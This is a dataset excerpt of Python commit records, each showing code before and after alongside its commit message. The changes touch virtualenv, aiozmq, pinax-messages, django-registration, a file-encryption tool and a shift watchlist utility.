setuptools=not no_setuptools,
pip=not no_pip
)
| from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
Add a main function (more support for the api in the legacy virtualenv).from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| <commit_before>from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
<commit_msg>Add a main function (more support for the api in the legacy virtualenv).<commit_after>from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
|
33f1cd2950bf1544f4bb481aa0c31326a5c061ab | examples/rpc_pubsub.py | examples/rpc_pubsub.py | import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| Make rpc pubsub example stable | Make rpc pubsub example stable
| Python | bsd-2-clause | aio-libs/aiozmq,asteven/aiozmq,claws/aiozmq,MetaMemoryT/aiozmq | import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
Make rpc pubsub example stable | import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| <commit_before>import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
<commit_msg>Make rpc pubsub example stable<commit_after> | import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
Make rpc pubsub example stableimport asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| <commit_before>import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
<commit_msg>Make rpc pubsub example stable<commit_after>import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
|
fd5507db05429635200d56d4763fe623dfa6a811 | pinax/messages/apps.py | pinax/messages/apps.py | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| Drop miscellaneous features deprecated in Django 3 | Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3
| Python | mit | pinax/pinax-messages,pinax/pinax-messages | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3 | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| <commit_before>from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
<commit_msg>Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3<commit_after> | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| <commit_before>from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
<commit_msg>Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3<commit_after>from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
|
891ce02157c0862f707cab7a140389e0b059acd4 | registration/__init__.py | registration/__init__.py | VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
| VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| Fix version number reporting so we can be installed before Django. | Fix version number reporting so we can be installed before Django.
| Python | bsd-3-clause | christang/django-registration-1.5,fedenko/django-registration,fedenko/django-registration,christang/django-registration-1.5 | VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
Fix version number reporting so we can be installed before Django. | VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| <commit_before>VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
<commit_msg>Fix version number reporting so we can be installed before Django.<commit_after> | VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
Fix version number reporting so we can be installed before Django.VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| <commit_before>VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
<commit_msg>Fix version number reporting so we can be installed before Django.<commit_after>VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
7b2db239b0862db256722f57241c74d4cc9b42ff | diss/__init__.py | diss/__init__.py |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
|
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
| Fix mimetype detection on symlink | Fix mimetype detection on symlink
| Python | agpl-3.0 | hoh/Billabong,hoh/Billabong |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
Fix mimetype detection on symlink |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
| <commit_before>
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
<commit_msg>Fix mimetype detection on symlink<commit_after> |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
|
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
Fix mimetype detection on symlink
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
| <commit_before>
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
<commit_msg>Fix mimetype detection on symlink<commit_after>
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
|
421e811242b737a7b1bf27814d70f719f345131b | watchlist/utils.py | watchlist/utils.py | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| Order weekday columns in watchlist | Order weekday columns in watchlist
| Python | mit | hackerspace-ntnu/website,hackerspace-ntnu/website,hackerspace-ntnu/website | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
